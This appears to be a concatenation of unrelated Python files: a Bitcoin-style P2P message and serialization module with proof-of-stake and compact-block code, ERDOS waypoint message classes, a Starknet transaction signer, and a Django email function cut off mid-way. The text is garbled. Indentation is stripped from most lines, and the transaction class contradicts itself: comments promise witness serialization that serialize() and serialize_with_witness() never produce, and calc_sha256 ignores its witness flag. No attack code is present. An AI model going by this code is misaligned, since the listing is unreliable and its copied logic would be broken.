def serialize(self):
r = b""
r += struct.pack("<Q", self.nServices)
r += self.pchReserved
r += socket.inet_aton(self.ip)
r += struct.pack(">H", self.port)
return r
def __repr__(self):
return "CAddress(nServices=%i ip=%s port=%i)" % (self.nServices,
self.ip, self.port)
class CInv():
typemap = {
0: "Error",
1: "TX",
2: "Block",
}
def __init__(self, t=0, h=0):
self.type = t
self.hash = h
def deserialize(self, f):
self.type = struct.unpack("<i", f.read(4))[0]
self.hash = deser_uint256(f)
def serialize(self):
r = b""
r += struct.pack("<i", self.type)
r += ser_uint256(self.hash)
return r
def __repr__(self):
return "CInv(type=%s hash=%064x)" \
% (self.typemap[self.type], self.hash)
class CBlockLocator():
def __init__(self):
self.nVersion = MY_VERSION
self.vHave = []
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
self.vHave = deser_uint256_vector(f)
def serialize(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += ser_uint256_vector(self.vHave)
return r
def __repr__(self):
return "CBlockLocator(nVersion=%i vHave=%s)" \
% (self.nVersion, repr(self.vHave))
class COutPoint():
def __init__(self, hash=0, n=0):
self.hash = hash
self.n = n
def deserialize(self, f):
self.hash = deser_uint256(f)
self.n = struct.unpack("<I", f.read(4))[0]
def serialize(self):
r = b""
r += ser_uint256(self.hash)
r += struct.pack("<I", self.n)
return r
def __repr__(self):
return "COutPoint(hash=%064x n=%i)" % (self.hash, self.n)
class CTxIn():
def __init__(self, outpoint=None, scriptSig=b"", nSequence=0):
if outpoint is None:
self.prevout = COutPoint()
else:
self.prevout = outpoint
self.scriptSig = scriptSig
self.nSequence = nSequence
def deserialize(self, f):
self.prevout = COutPoint()
self.prevout.deserialize(f)
self.scriptSig = deser_string(f)
self.nSequence = struct.unpack("<I", f.read(4))[0]
def serialize(self):
r = b""
r += self.prevout.serialize()
r += ser_string(self.scriptSig)
r += struct.pack("<I", self.nSequence)
return r
def __repr__(self):
return "CTxIn(prevout=%s scriptSig=%s nSequence=%i)" \
% (repr(self.prevout), bytes_to_hex_str(self.scriptSig),
self.nSequence)
class CTxOut():
def __init__(self, nValue=0, scriptPubKey=b""):
self.nValue = nValue
self.scriptPubKey = scriptPubKey
def deserialize(self, f):
self.nValue = struct.unpack("<q", f.read(8))[0]
self.scriptPubKey = deser_string(f)
def serialize(self):
r = b""
r += struct.pack("<q", self.nValue)
r += ser_string(self.scriptPubKey)
return r
def __repr__(self):
return "CTxOut(nValue=%i.%08i scriptPubKey=%s)" \
% (self.nValue // COIN, self.nValue % COIN,
bytes_to_hex_str(self.scriptPubKey))
class CTransaction():
def __init__(self, tx=None):
if tx is None:
self.nVersion = 1
self.vin = []
self.vout = []
self.nLockTime = 0
self.sha256 = None
self.hash = None
else:
self.nVersion = tx.nVersion
self.vin = copy.deepcopy(tx.vin)
self.vout = copy.deepcopy(tx.vout)
self.nLockTime = tx.nLockTime
self.sha256 = tx.sha256
self.hash = tx.hash
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
self.vin = deser_vector(f, CTxIn)
flags = 0
if len(self.vin) == 0:
flags = struct.unpack("<B", f.read(1))[0]
# Not sure why flags can't be zero, but this
# matches the implementation in bitcoind
if (flags != 0):
self.vin = deser_vector(f, CTxIn)
self.vout = deser_vector(f, CTxOut)
else:
self.vout = deser_vector(f, CTxOut)
self.nLockTime = struct.unpack("<I", f.read(4))[0]
self.sha256 = None
self.hash = None
def serialize_without_witness(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += ser_vector(self.vin)
r += ser_vector(self.vout)
r += struct.pack("<I", self.nLockTime)
return r
    # Regular serialization is with witness -- must explicitly
    # call serialize_without_witness to exclude witness data.
    def serialize(self):
        return self.serialize_without_witness()
    # Witness data is not carried here, so "with witness" == base form.
    def serialize_with_witness(self):
        return self.serialize_without_witness()
# Recalculate the txid (transaction hash without witness)
def rehash(self):
self.sha256 = None
self.calc_sha256()
# We will only cache the serialization without witness in
# self.sha256 and self.hash -- those are expected to be the txid.
    def calc_sha256(self, with_witness=False):
        if self.sha256 is None:
            self.sha256 = uint256_from_str(hash256(self.serialize_without_witness()))
            self.hash = encode(hash256(self.serialize_without_witness())[::-1], 'hex_codec').decode('ascii')
        # callers such as calc_witness_merkle_root rely on the return value
        return self.sha256
def is_valid(self):
self.calc_sha256()
for tout in self.vout:
if tout.nValue < 0 or tout.nValue > 21000000 * COIN:
return False
return True
def __repr__(self):
return "CTransaction(nVersion=%i vin=%s vout=%s nLockTime=%i)" \
% (self.nVersion, repr(self.vin), repr(self.vout), self.nLockTime)
class CBlockHeader():
def __init__(self, header=None):
if header is None:
self.set_null()
else:
self.nVersion = header.nVersion
self.hashPrevBlock = header.hashPrevBlock
self.hashMerkleRoot = header.hashMerkleRoot
self.nTime = header.nTime
self.nBits = header.nBits
self.nNonce = header.nNonce
self.nAccumulatorCheckpoint = header.nAccumulatorCheckpoint
self.sha256 = header.sha256
self.hash = header.hash
self.calc_sha256()
def set_null(self):
self.nVersion = 4
self.hashPrevBlock = 0
self.hashMerkleRoot = 0
self.nTime = 0
self.nBits = 0
self.nNonce = 0
self.nAccumulatorCheckpoint = 0
self.sha256 = None
self.hash = None
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
self.hashPrevBlock = deser_uint256(f)
self.hashMerkleRoot = deser_uint256(f)
self.nTime = struct.unpack("<I", f.read(4))[0]
self.nBits = struct.unpack("<I", f.read(4))[0]
self.nNonce = struct.unpack("<I", f.read(4))[0]
self.nAccumulatorCheckpoint = deser_uint256(f)
self.sha256 = None
self.hash = None
def serialize(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += ser_uint256(self.hashPrevBlock)
r += ser_uint256(self.hashMerkleRoot)
r += struct.pack("<I", self.nTime)
r += struct.pack("<I", self.nBits)
r += struct.pack("<I", self.nNonce)
r += ser_uint256(self.nAccumulatorCheckpoint)
return r
def calc_sha256(self):
if self.sha256 is None:
r = b""
r += struct.pack("<i", self.nVersion)
r += ser_uint256(self.hashPrevBlock)
r += ser_uint256(self.hashMerkleRoot)
r += struct.pack("<I", self.nTime)
r += struct.pack("<I", self.nBits)
r += struct.pack("<I", self.nNonce)
r += ser_uint256(self.nAccumulatorCheckpoint)
self.sha256 = uint256_from_str(hash256(r))
self.hash = encode(hash256(r)[::-1], 'hex_codec').decode('ascii')
def rehash(self):
self.sha256 = None
self.calc_sha256()
return self.sha256
# BLES Uniqueness
def get_uniqueness(self, prevout):
r = b""
r += struct.pack("<I", prevout.n)
r += ser_uint256(prevout.hash)
return r
def solve_stake(self, prevouts):
target0 = uint256_from_compact(self.nBits)
loop = True
while loop:
for prevout in prevouts:
nvalue, txBlockTime, stakeModifier, hashStake = prevouts[prevout]
target = int(target0 * nvalue / 100) % 2**256
data = b""
data += ser_uint64(stakeModifier)
data += struct.pack("<I", txBlockTime)
                # for zPoS the prevout is the serial hash as a hex string
if isinstance(prevout, COutPoint):
data += self.get_uniqueness(prevout)
else:
data += ser_uint256(uint256_from_str(bytes.fromhex(hashStake)[::-1]))
data += struct.pack("<I", self.nTime)
posHash = uint256_from_str(hash256(data))
if posHash <= target:
self.prevoutStake = prevout
loop = False
break
if loop:
self.nTime += 1
return True
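    # solve_stake sketch: each candidate prevout is tested against the
    # compact target scaled by its value (the /100 factor above is a
    # framework convention); the kernel hash covers the stake modifier, the
    # staked tx's block time, the prevout's uniqueness bytes (or the zPoS
    # serial hash), and this header's nTime, which is bumped one second per
    # failed round until a kernel is found.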
def __repr__(self):
return "CBlockHeader(nVersion=%i hashPrevBlock=%064x hashMerkleRoot=%064x nTime=%s nBits=%08x nNonce=%08x)" \
% (self.nVersion, self.hashPrevBlock, self.hashMerkleRoot,
time.ctime(self.nTime), self.nBits, self.nNonce)
class CBlock(CBlockHeader):
def __init__(self, header=None):
super(CBlock, self).__init__(header)
self.vtx = []
def deserialize(self, f):
super(CBlock, self).deserialize(f)
self.vtx = deser_vector(f, CTransaction)
def serialize(self, with_witness=False):
r = b""
r += super(CBlock, self).serialize()
if with_witness:
r += ser_vector(self.vtx, "serialize_with_witness")
else:
r += ser_vector(self.vtx, "serialize_without_witness")
if hasattr(self, 'vchBlockSig'):
r += ser_string(self.vchBlockSig)
return r
# Calculate the merkle root given a vector of transaction hashes
@classmethod
def get_merkle_root(cls, hashes):
while len(hashes) > 1:
newhashes = []
for i in range(0, len(hashes), 2):
i2 = min(i+1, len(hashes)-1)
newhashes.append(hash256(hashes[i] + hashes[i2]))
hashes = newhashes
return uint256_from_str(hashes[0])
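    # Worked sketch: with three leaf hashes [a, b, c] the first pass pairs
    # (a, b) and duplicates the odd leaf as (c, c) via the min() clamp
    # above; the second pass hashes the two parents into the root.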
def calc_merkle_root(self):
hashes = []
for tx in self.vtx:
tx.calc_sha256()
hashes.append(ser_uint256(tx.sha256))
return self.get_merkle_root(hashes)
def calc_witness_merkle_root(self):
# For witness root purposes, the hash of the
# coinbase, with witness, is defined to be 0...0
hashes = [ser_uint256(0)]
for tx in self.vtx[1:]:
# Calculate the hashes with witness data
hashes.append(ser_uint256(tx.calc_sha256(True)))
return self.get_merkle_root(hashes)
def is_valid(self):
self.calc_sha256()
target = uint256_from_compact(self.nBits)
if self.sha256 > target:
return False
for tx in self.vtx:
if not tx.is_valid():
return False
if self.calc_merkle_root() != self.hashMerkleRoot:
return False
return True
def solve(self):
self.rehash()
target = uint256_from_compact(self.nBits)
while self.sha256 > target:
self.nNonce += 1
self.rehash()
def sign_block(self, key, low_s=True):
data = b""
data += struct.pack("<i", self.nVersion)
data += ser_uint256(self.hashPrevBlock)
data += ser_uint256(self.hashMerkleRoot)
data += struct.pack("<I", self.nTime)
data += struct.pack("<I", self.nBits)
data += struct.pack("<I", self.nNonce)
data += ser_uint256(self.nAccumulatorCheckpoint)
sha256NoSig = hash256(data)
self.vchBlockSig = key.sign(sha256NoSig, low_s=low_s)
def __repr__(self):
return "CBlock(nVersion=%i hashPrevBlock=%064x hashMerkleRoot=%064x nTime=%s nBits=%08x nNonce=%08x vtx=%s)" \
% (self.nVersion, self.hashPrevBlock, self.hashMerkleRoot,
time.ctime(self.nTime), self.nBits, self.nNonce, repr(self.vtx))
class PrefilledTransaction():
def __init__(self, index=0, tx = None):
self.index = index
self.tx = tx
def deserialize(self, f):
self.index = deser_compact_size(f)
self.tx = CTransaction()
self.tx.deserialize(f)
def serialize(self, with_witness=True):
r = b""
r += ser_compact_size(self.index)
if with_witness:
r += self.tx.serialize_with_witness()
else:
r += self.tx.serialize_without_witness()
return r
def serialize_without_witness(self):
return self.serialize(with_witness=False)
def serialize_with_witness(self):
return self.serialize(with_witness=True)
def __repr__(self):
return "PrefilledTransaction(index=%d, tx=%s)" % (self.index, repr(self.tx))
# This is what we send on the wire, in a cmpctblock message.
class P2PHeaderAndShortIDs():
def __init__(self):
self.header = CBlockHeader()
self.nonce = 0
self.shortids_length = 0
self.shortids = []
self.prefilled_txn_length = 0
self.prefilled_txn = []
def deserialize(self, f):
self.header.deserialize(f)
self.nonce = struct.unpack("<Q", f.read(8))[0]
self.shortids_length = deser_compact_size(f)
for i in range(self.shortids_length):
# shortids are defined to be 6 bytes in the spec, so append
# two zero bytes and read it in as an 8-byte number
self.shortids.append(struct.unpack("<Q", f.read(6) + b'\x00\x00')[0])
self.prefilled_txn = deser_vector(f, PrefilledTransaction)
self.prefilled_txn_length = len(self.prefilled_txn)
# When using version 2 compact blocks, we must serialize with_witness.
def serialize(self, with_witness=False):
r = b""
r += self.header.serialize()
r += struct.pack("<Q", self.nonce)
r += ser_compact_size(self.shortids_length)
for x in self.shortids:
# We only want the first 6 bytes
r += struct.pack("<Q", x)[0:6]
if with_witness:
r += ser_vector(self.prefilled_txn, "serialize_with_witness")
else:
r += ser_vector(self.prefilled_txn, "serialize_without_witness")
return r
def __repr__(self):
return "P2PHeaderAndShortIDs(header=%s, nonce=%d, shortids_length=%d, shortids=%s, prefilled_txn_length=%d, prefilledtxn=%s" % (repr(self.header), self.nonce, self.shortids_length, repr(self.shortids), self.prefilled_txn_length, repr(self.prefilled_txn))
# P2P version of the above that will use witness serialization (for compact
# block version 2)
class P2PHeaderAndShortWitnessIDs(P2PHeaderAndShortIDs):
def serialize(self):
return super(P2PHeaderAndShortWitnessIDs, self).serialize(with_witness=True)
# Calculate the BIP 152-compact blocks shortid for a given transaction hash
def calculate_shortid(k0, k1, tx_hash):
expected_shortid = siphash256(k0, k1, tx_hash)
expected_shortid &= 0x0000ffffffffffff
return expected_shortid
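# Hedged usage sketch: the two SipHash keys come from the block header and
# nonce (see HeaderAndShortIDs.get_siphash_keys below), and the shortid
# keeps only the low 6 bytes of the 64-bit SipHash output:
#
#   k0, k1 = header_and_shortids.get_siphash_keys()   # assumed instance
#   shortid = calculate_shortid(k0, k1, tx.sha256)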
# This version gets rid of the array lengths, and reinterprets the differential
# encoding into indices that can be used for lookup.
class HeaderAndShortIDs():
def __init__(self, p2pheaders_and_shortids = None):
self.header = CBlockHeader()
self.nonce = 0
self.shortids = []
self.prefilled_txn = []
self.use_witness = False
        if p2pheaders_and_shortids is not None:
self.header = p2pheaders_and_shortids.header
self.nonce = p2pheaders_and_shortids.nonce
self.shortids = p2pheaders_and_shortids.shortids
last_index = -1
for x in p2pheaders_and_shortids.prefilled_txn:
self.prefilled_txn.append(PrefilledTransaction(x.index + last_index + 1, x.tx))
last_index = self.prefilled_txn[-1].index
def to_p2p(self):
if self.use_witness:
ret = P2PHeaderAndShortWitnessIDs()
else:
ret = P2PHeaderAndShortIDs()
ret.header = self.header
ret.nonce = self.nonce
ret.shortids_length = len(self.shortids)
ret.shortids = self.shortids
ret.prefilled_txn_length = len(self.prefilled_txn)
ret.prefilled_txn = []
last_index = -1
for x in self.prefilled_txn:
ret.prefilled_txn.append(PrefilledTransaction(x.index - last_index - 1, x.tx))
last_index = x.index
return ret
def get_siphash_keys(self):
header_nonce = self.header.serialize()
header_nonce += struct.pack("<Q", self.nonce)
hash_header_nonce_as_str = sha256(header_nonce)
key0 = struct.unpack("<Q", hash_header_nonce_as_str[0:8])[0]
key1 = struct.unpack("<Q", hash_header_nonce_as_str[8:16])[0]
return [ key0, key1 ]
# Version 2 compact blocks use wtxid in shortids (rather than txid)
    def initialize_from_block(self, block, nonce=0, prefill_list=(0,), use_witness=False):
self.header = CBlockHeader(block)
self.nonce = nonce
self.prefilled_txn = [ PrefilledTransaction(i, block.vtx[i]) for i in prefill_list ]
self.shortids = []
self.use_witness = use_witness
[k0, k1] = self.get_siphash_keys()
for i in range(len(block.vtx)):
if i not in prefill_list:
tx_hash = block.vtx[i].sha256
if use_witness:
tx_hash = block.vtx[i].calc_sha256(with_witness=True)
self.shortids.append(calculate_shortid(k0, k1, tx_hash))
    def __repr__(self):
        return "HeaderAndShortIDs(header=%s, nonce=%d, shortids=%s, prefilled_txn=%s)" % (repr(self.header), self.nonce, repr(self.shortids), repr(self.prefilled_txn))
class BlockTransactionsRequest():
def __init__(self, blockhash=0, indexes = None):
self.blockhash = blockhash
        self.indexes = indexes if indexes is not None else []
def deserialize(self, f):
self.blockhash = deser_uint256(f)
indexes_length = deser_compact_size(f)
for i in range(indexes_length):
self.indexes.append(deser_compact_size(f))
def serialize(self):
r = b""
r += ser_uint256(self.blockhash)
r += ser_compact_size(len(self.indexes))
for x in self.indexes:
r += ser_compact_size(x)
return r
# helper to set the differentially encoded indexes from absolute ones
def from_absolute(self, absolute_indexes):
self.indexes = []
last_index = -1
for x in absolute_indexes:
self.indexes.append(x-last_index-1)
last_index = x
def to_absolute(self):
absolute_indexes = []
last_index = -1
for x in self.indexes:
absolute_indexes.append(x+last_index+1)
last_index = absolute_indexes[-1]
return absolute_indexes
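    # Worked example of the differential encoding: absolute indexes [1, 3, 4]
    # encode as [1, 1, 0] (each entry is the gap to the previous absolute
    # index minus one), and to_absolute() inverts the transform exactly.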
def __repr__(self):
return "BlockTransactionsRequest(hash=%064x indexes=%s)" % (self.blockhash, repr(self.indexes))
class BlockTransactions():
def __init__(self, blockhash=0, transactions = None):
self.blockhash = blockhash
        self.transactions = transactions if transactions is not None else []
def deserialize(self, f):
self.blockhash = deser_uint256(f)
self.transactions = deser_vector(f, CTransaction)
def serialize(self, with_witness=True):
r = b""
r += ser_uint256(self.blockhash)
if with_witness:
r += ser_vector(self.transactions, "serialize_with_witness")
else:
r += ser_vector(self.transactions, "serialize_without_witness")
return r
def __repr__(self):
return "BlockTransactions(hash=%064x transactions=%s)" % (self.blockhash, repr(self.transactions))
class CPartialMerkleTree():
def __init__(self):
self.nTransactions = 0
self.vHash = []
self.vBits = []
self.fBad = False
def deserialize(self, f):
self.nTransactions = struct.unpack("<i", f.read(4))[0]
self.vHash = deser_uint256_vector(f)
vBytes = deser_string(f)
self.vBits = []
for i in range(len(vBytes) * 8):
self.vBits.append(vBytes[i//8] & (1 << (i % 8)) != 0)
def serialize(self):
r = b""
r += struct.pack("<i", self.nTransactions)
r += ser_uint256_vector(self.vHash)
vBytesArray = bytearray([0x00] * ((len(self.vBits) + 7)//8))
for i in range(len(self.vBits)):
vBytesArray[i // 8] |= self.vBits[i] << (i % 8)
r += ser_string(bytes(vBytesArray))
return r
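    # Bit-packing sketch: vBits [True, False, True] packs little-endian
    # within the byte into 0b00000101, so the serialized flag field is the
    # compact-size length prefix b'\x01' followed by b'\x05'.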
def __repr__(self):
return "CPartialMerkleTree(nTransactions=%d, vHash=%s, vBits=%s)" % (self.nTransactions, repr(self.vHash), repr(self.vBits))
class CMerkleBlock():
def __init__(self):
self.header = CBlockHeader()
self.txn = CPartialMerkleTree()
def deserialize(self, f):
self.header.deserialize(f)
self.txn.deserialize(f)
def serialize(self):
r = b""
r += self.header.serialize()
r += self.txn.serialize()
return r
def __repr__(self):
return "CMerkleBlock(header=%s, txn=%s)" % (repr(self.header), repr(self.txn))
# Objects that correspond to messages on the wire
class msg_version():
command = b"version"
def __init__(self):
self.nVersion = MY_VERSION
self.nServices = NODE_NETWORK
self.nTime = int(time.time())
self.addrTo = CAddress()
self.addrFrom = CAddress()
self.nNonce = random.getrandbits(64)
self.strSubVer = MY_SUBVERSION
self.nStartingHeight = -1
self.nRelay = MY_RELAY
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
if self.nVersion == 10300:
self.nVersion = 300
self.nServices = struct.unpack("<Q", f.read(8))[0]
self.nTime = struct.unpack("<q", f.read(8))[0]
self.addrTo = CAddress()
self.addrTo.deserialize(f)
if self.nVersion >= 106:
self.addrFrom = CAddress()
self.addrFrom.deserialize(f)
self.nNonce = struct.unpack("<Q", f.read(8))[0]
self.strSubVer = deser_string(f)
else:
self.addrFrom = None
self.nNonce = None
self.strSubVer = None
self.nStartingHeight = None
if self.nVersion >= 209:
self.nStartingHeight = struct.unpack("<i", f.read(4))[0]
else:
self.nStartingHeight = None
if self.nVersion >= 70001:
# Relay field is optional for version 70001 onwards
try:
self.nRelay = struct.unpack("<b", f.read(1))[0]
            except struct.error:
self.nRelay = 0
else:
self.nRelay = 0
def serialize(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += struct.pack("<Q", self.nServices)
r += struct.pack("<q", self.nTime)
r += self.addrTo.serialize()
r += self.addrFrom.serialize()
r += struct.pack("<Q", self.nNonce)
r += ser_string(self.strSubVer)
r += struct.pack("<i", self.nStartingHeight)
r += struct.pack("<b", self.nRelay)
return r
def __repr__(self):
return 'msg_version(nVersion=%i nServices=%i nTime=%s addrTo=%s addrFrom=%s nNonce=0x%016X strSubVer=%s nStartingHeight=%i nRelay=%i)' \
% (self.nVersion, self.nServices, time.ctime(self.nTime),
repr(self.addrTo), repr(self.addrFrom), self.nNonce,
self.strSubVer, self.nStartingHeight, self.nRelay)
class msg_verack():
command = b"verack"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_verack()"
class msg_addr():
command = b"addr"
def __init__(self):
self.addrs = []
def deserialize(self, f):
self.addrs = deser_vector(f, CAddress)
def serialize(self):
return ser_vector(self.addrs)
def __repr__(self):
return "msg_addr(addrs=%s)" % (repr(self.addrs))
class msg_inv():
command = b"inv"
def __init__(self, inv=None):
if inv is None:
self.inv = []
else:
self.inv = inv
def deserialize(self, f):
self.inv = deser_vector(f, CInv)
def serialize(self):
return ser_vector(self.inv)
def __repr__(self):
return "msg_inv(inv=%s)" % (repr(self.inv))
class msg_getdata():
command = b"getdata"
def __init__(self, inv=None):
        self.inv = inv if inv is not None else []
def deserialize(self, f):
self.inv = deser_vector(f, CInv)
def serialize(self):
return ser_vector(self.inv)
def __repr__(self):
return "msg_getdata(inv=%s)" % (repr(self.inv))
class msg_getblocks():
command = b"getblocks"
def __init__(self):
self.locator = CBlockLocator()
self.hashstop = 0
def deserialize(self, f):
self.locator = CBlockLocator()
self.locator.deserialize(f)
self.hashstop = deser_uint256(f)
def serialize(self):
r = b""
r += self.locator.serialize()
r += ser_uint256(self.hashstop)
return r
def __repr__(self):
return "msg_getblocks(locator=%s hashstop=%064x)" \
% (repr(self.locator), self.hashstop)
class msg_tx():
command = b"tx"
    def __init__(self, tx=None):
        # avoid a shared mutable default; deserialize() mutates self.tx
        self.tx = tx if tx is not None else CTransaction()
def deserialize(self, f):
self.tx.deserialize(f)
def serialize(self):
return self.tx.serialize_without_witness()
def __repr__(self):
return "msg_tx(tx=%s)" % (repr(self.tx))
class msg_witness_tx(msg_tx):
def serialize(self):
return self.tx.serialize_with_witness()
class msg_block():
command = b"block"
def __init__(self, block=None):
if block is None:
self.block = CBlock()
else:
self.block = block
def deserialize(self, f):
self.block.deserialize(f)
def serialize(self):
return self.block.serialize(with_witness=False)
def __repr__(self):
return "msg_block(block=%s)" % (repr(self.block))
# for cases where a user needs tighter control over what is sent over the wire
# note that the user must supply the name of the command, and the data
class msg_generic():
def __init__(self, command, data=None):
self.command = command
self.data = data
def serialize(self):
return self.data
def __repr__(self):
return "msg_generic()"
class msg_witness_block(msg_block):
def serialize(self):
r = self.block.serialize(with_witness=True)
return r
class msg_getaddr():
command = b"getaddr"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_getaddr()"
class msg_ping():
command = b"ping"
def __init__(self, nonce=0):
self.nonce = nonce
def deserialize(self, f):
self.nonce = struct.unpack("<Q", f.read(8))[0]
def serialize(self):
r = b""
r += struct.pack("<Q", self.nonce)
return r
def __repr__(self):
return "msg_ping(nonce=%08x)" % self.nonce
class msg_pong():
command = b"pong"
def __init__(self, nonce=0):
self.nonce = nonce
def deserialize(self, f):
self.nonce = struct.unpack("<Q", f.read(8))[0]
def serialize(self):
r = b""
r += struct.pack("<Q", self.nonce)
return r
def __repr__(self):
return "msg_pong(nonce=%08x)" % self.nonce
class msg_mempool():
command = b"mempool"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_mempool()"
class msg_sendheaders():
command = b"sendheaders"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_sendheaders()"
# getheaders message has
# number of entries
# vector of hashes
# hash_stop (hash of last desired block header, 0 to get as many as possible)
class msg_getheaders():
command = b"getheaders"
def __init__(self):
self.locator = CBlockLocator()
self.hashstop = 0
def deserialize(self, f):
self.locator = CBlockLocator()
self.locator.deserialize(f)
self.hashstop = deser_uint256(f)
def serialize(self):
r = b""
r += self.locator.serialize()
r += ser_uint256(self.hashstop)
return r
def __repr__(self):
return "msg_getheaders(locator=%s, stop=%064x)" \
% (repr(self.locator), self.hashstop)
# headers message has
# <count> <vector of block headers>
class msg_headers():
command = b"headers"
def __init__(self, headers=None):
self.headers = headers if headers is not None else []
def deserialize(self, f):
# comment in bitcoind indicates these should be deserialized as blocks
blocks = deser_vector(f, CBlock)
for x in blocks:
self.headers.append(CBlockHeader(x))
def serialize(self):
blocks = [CBlock(x) for x in self.headers]
return ser_vector(blocks)
def __repr__(self):
return "msg_headers(headers=%s)" % repr(self.headers)
class msg_reject():
command = b"reject"
REJECT_MALFORMED = 1
def __init__(self):
self.message = b""
self.code = 0
self.reason = b""
self.data = 0
def deserialize(self, f):
self.message = deser_string(f)
self.code = struct.unpack("<B", f.read(1))[0]
self.reason = deser_string(f)
if (self.code != self.REJECT_MALFORMED and
(self.message == b"block" or self.message == b"tx")):
self.data = deser_uint256(f)
def serialize(self):
r = ser_string(self.message)
r += struct.pack("<B", self.code)
r += ser_string(self.reason)
if (self.code != self.REJECT_MALFORMED and
(self.message == b"block" or self.message == b"tx")):
r += ser_uint256(self.data)
return r
def __repr__(self):
return "msg_reject: %s %d %s [%064x]" \
% (self.message, self.code, self.reason, self.data)
class msg_feefilter():
command = b"feefilter"
def __init__(self, feerate=0):
self.feerate = feerate
def deserialize(self, f):
self.feerate = struct.unpack("<Q", f.read(8))[0]
def serialize(self):
r = b""
r += struct.pack("<Q", self.feerate)
return r
def __repr__(self):
return "msg_feefilter(feerate=%08x)" % self.feerate
class msg_sendcmpct():
command = b"sendcmpct"
def __init__(self):
self.announce = False
self.version = 1
def deserialize(self, f):
self.announce = struct.unpack("<?", f.read(1))[0]
self.version = struct.unpack("<Q", f.read(8))[0]
def serialize(self):
r = b""
r += struct.pack("<?", self.announce)
r += struct.pack("<Q", self.version)
return r
def __repr__(self):
return "msg_sendcmpct(announce=%s, version=%lu)" % (self.announce, self.version)
class msg_cmpctblock():
command = b"cmpctblock"
def __init__(self, header_and_shortids = None):
self.header_and_shortids = header_and_shortids
def deserialize(self, f):
self.header_and_shortids = P2PHeaderAndShortIDs()
self.header_and_shortids.deserialize(f)
def serialize(self):
r = b""
r += self.header_and_shortids.serialize()
return r
def __repr__(self):
return "msg_cmpctblock(HeaderAndShortIDs=%s)" % repr(self.header_and_shortids)
class msg_getblocktxn():
command = b"getblocktxn"
def __init__(self):
self.block_txn_request = None
def deserialize(self, f):
self.block_txn_request = BlockTransactionsRequest()
self.block_txn_request.deserialize(f)
def serialize(self):
r = b""
r += self.block_txn_request.serialize()
return r
def __repr__(self):
return "msg_getblocktxn(block_txn_request=%s)" % (repr(self.block_txn_request))
class msg_blocktxn():
command = b"blocktxn"
def __init__(self):
self.block_transactions = BlockTransactions()
def deserialize(self, f):
self.block_transactions.deserialize(f)
def serialize(self):
r = b""
r += self.block_transactions.serialize(with_witness=False)
return r
def __repr__(self):
return "msg_blocktxn(block_transactions=%s)" % (repr(self.block_transactions))
class msg_witness_blocktxn(msg_blocktxn):
def serialize(self):
r = b""
r += self.block_transactions.serialize(with_witness=True)
return r
|
from erdos.message import Message
class WaypointsMessage(Message):
""" This class represents a message to be used to send waypoints."""
def __init__(self, timestamp, waypoints=None, target_speed=0, wp_angle=0,
wp_vector=0, wp_angle_speed=0, wp_vector_speed=0,
stream_name='default'):
super(WaypointsMessage, self).__init__(None, timestamp, stream_name)
# Values used in Carla 0.8.4.
self.wp_angle = wp_angle
self.wp_vector = wp_vector
self.wp_angle_speed = wp_angle_speed
self.wp_vector_speed = wp_vector_speed
# Value used in Carla 0.9.x
self.target_speed = target_speed
self.waypoints = waypoints
def __str__(self):
        return 'WaypointsMessage(timestamp: {}, wp_angle: {}, wp_vector: {}, '\
            'wp_angle_speed: {}, wp_vector_speed: {}, waypoints: {})'.format(
self.timestamp, self.wp_angle, self.wp_vector,
self.wp_angle_speed, self.wp_vector_speed, self.waypoints)
class BehaviorMessage(Message):
def __init__(self, timestamp,
target_lane_id,
target_speed,
target_deadline,
target_leading_vehicle_id=None):
super(BehaviorMessage, self).__init__(None, timestamp, 'default')
self.target_lane_id = target_lane_id
self.target_speed = target_speed
self.target_deadline = target_deadline
self.target_leading_vehicle_id = target_leading_vehicle_id
def __str__(self):
return 'BehaviorMessage(timestamp: {}, target_lane_id: {}, '\
'target_speed: {}, target_deadline: {}, '\
'target_leading_vehicle_id: {})'.format(
self.timestamp, self.target_lane_id, self.target_speed,
self.target_deadline, self.target_leading_vehicle_id)
|
"""Utility for sending signed transactions to an Account on Starknet."""
# Source: https://github.com/perama-v/GoL2/blob/main/tests/utils/Signer.py
# Commit Hash: a5c05c15be1569730da04fc4f1f2e89be38c69be
# License: MIT
from starkware.crypto.signature.signature import private_to_stark_key, sign
from starkware.starknet.public.abi import get_selector_from_name
from starkware.cairo.common.hash_state import compute_hash_on_elements
class Signer():
"""
Utility for sending signed transactions to an Account on Starknet.
Parameters
----------
private_key : int
Examples
---------
    Constructing a Signer object
>>> signer = Signer(1234)
Sending a transaction
>>> await signer.send_transaction(account,
account.contract_address,
'set_public_key',
[other.public_key]
)
"""
def __init__(self, private_key):
self.private_key = private_key
self.public_key = private_to_stark_key(private_key)
def sign(self, message_hash):
return sign(msg_hash=message_hash, priv_key=self.private_key)
async def send_transaction(self, account, to, selector_name, calldata, nonce=None):
if nonce is None:
execution_info = await account.get_nonce().call()
nonce, = execution_info.result
selector = get_selector_from_name(selector_name)
message_hash = hash_message(
account.contract_address, to, selector, calldata, nonce)
sig_r, sig_s = self.sign(message_hash)
return await account.execute(to, selector, calldata, nonce).invoke(signature=[sig_r, sig_s])
def hash_message(sender, to, selector, calldata, nonce):
message = [
sender,
to,
selector,
compute_hash_on_elements(calldata),
nonce
]
return compute_hash_on_elements(message)
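# Hedged usage sketch (illustrative values, not from a real deployment):
#
#   selector = get_selector_from_name('set_public_key')
#   message_hash = hash_message(sender=0x123, to=0x456, selector=selector,
#                               calldata=[42], nonce=0)
#   sig_r, sig_s = Signer(1234).sign(message_hash)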
|
from __future__ import unicode_literals
from django.conf import settings
from django.contrib.auth.tokens import default_token_generator
from django.utils import translation
from emailing.emails import HtmlEmail
def send_confirmation_mail(user, template, extra_context, subject):
translation.activate(settings.LANGUAGE_CODE)
if not extra_context:
extra_context = dict()
